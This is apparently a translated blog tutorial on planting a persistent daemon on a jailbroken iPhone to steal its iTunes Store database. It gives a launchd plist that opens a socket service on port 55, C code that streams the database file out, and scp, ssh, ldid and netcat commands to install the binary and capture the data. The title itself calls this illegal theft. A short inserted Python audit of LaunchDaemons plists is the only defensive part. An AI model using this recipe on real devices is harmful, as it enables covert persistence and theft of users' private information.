A background daemon that illegally steals itunesstore user information
I solemnly declare that I do not encourage the theft of user privacy and other behaviors. All hack learning is just to study how to defend. OK.
Auto-start
The previous article, "iOS security defense (1): Essential commands and tools for hack", described how to compile your own C program and start it manually. This article shows how to make the program start automatically.
1. Open Xcode and create a plist property file.
Note that the socket service name (SockServiceName) is set to 55. Opened in a text editor, the file reads:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Program</key>
    <string>/usr/bin/ncdemo</string>
    <key>StandardErrorPath</key>
    <string>/dev/null</string>
    <key>SessionCreate</key>
    <true/>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/ncdemo</string>
    </array>
    <key>inetdCompatibility</key>
    <dict>
        <key>Wait</key>
        <false/>
    </dict>
    <key>Sockets</key>
    <dict>
        <key>Listeners</key>
        <dict>
            <key>SockServiceName</key>
            <string>55</string>
        </dict>
    </dict>
</dict>
</plist>
Finally, copy the plist file with scp to root@192.168.1.114:/System/Library/LaunchDaemons.
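From the defender's side, a job like this is visible to anyone who audits the LaunchDaemons plists for socket listeners. The following check is an added example, not code from the original article; the function name audit_launchd_plist and both embedded sample plists are constructed here for illustration.

```python
import plistlib

# Constructed sample: the launchd job from this article, embedded so the check runs offline.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Program</key><string>/usr/bin/ncdemo</string>
<key>StandardErrorPath</key><string>/dev/null</string>
<key>SessionCreate</key><true/>
<key>ProgramArguments</key><array><string>/usr/bin/ncdemo</string></array>
<key>inetdCompatibility</key><dict><key>Wait</key><false/></dict>
<key>Sockets</key><dict><key>Listeners</key><dict>
<key>SockServiceName</key><string>55</string></dict></dict>
</dict></plist>"""

# Constructed sample: a job with no sockets, which should produce no findings.
BENIGN = plistlib.dumps({"Label": "com.example.noop", "Program": "/usr/libexec/noop"})


def audit_launchd_plist(data):
    """Return one finding per socket listener declared in a launchd job plist."""
    job = plistlib.loads(data)
    program = job.get("Program") or (job.get("ProgramArguments") or [None])[0]
    findings = []
    for name, entry in (job.get("Sockets") or {}).items():
        # launchd accepts either a single dict or an array of dicts per socket key.
        for sock in (entry if isinstance(entry, list) else [entry]):
            findings.append({
                "program": program,
                "socket_key": name,
                "service": str(sock.get("SockServiceName", "")),
                # inetd-style jobs get the connection on stdin/stdout, so any
                # program that writes to stdout is exposed to the network.
                "inetd_style": "inetdCompatibility" in job,
                "stderr_discarded": job.get("StandardErrorPath") == "/dev/null",
            })
    return findings


if __name__ == "__main__":
    for finding in audit_launchd_plist(SAMPLE):
        print(finding)
```

Run over every plist in the LaunchDaemons directory, any finding whose program is not a known system binary deserves a closer look.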
Write the itunesstore database program
Read itunesstored2.sqlitedb information and output it to stdout for easy reading.
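#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>   /* read, write, close */

/* Named DB_PATH rather than FILE so it does not shadow stdio's FILE type. */
#define DB_PATH "/var/mobile/Library/com.apple.itunesstored/itunesstored2.sqlitedb"

int main()
{
    int fd = open(DB_PATH, O_RDONLY);
    char buf[128];
    int ret = 0;

    if (fd < 0)
        return -1;

    /* Copy the database to stdout in 128-byte chunks. */
    while ((ret = read(fd, buf, sizeof(buf))) > 0) {
        write(fileno(stdout), buf, ret);
    }

    close(fd);
    return 0;
}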
Compile, copy, and sign
1. The compilation method was described in the previous article and is not repeated here ...... # Generate ncdemo running on ARM
2. Copy ncdemo to the device with scp and log on to the device.
$ scp ncdemo root@192.168.1.114:ncdemo
$ ssh root@192.168.1.114
3. Sign the binary
# ldid -S ncdemo
# mv ncdemo /usr/bin
Capture itunesstore data information
Now we only need to point netcat at the previously defined service name (55) to capture the device's itunesstore data locally.
$ nc 192.168.1.114 55 > itunesstored2.sqlitedb
Analyze itunesstore data information
Okay. Here is the simplest way to use the captured file: view it with the strings command.
$ strings itunesstored2.sqlitedb
Therefore, we can see which apps are installed on iPhone/iPad devices:
Of course, you can do whatever you want ...... It's late at night. Write it here first ......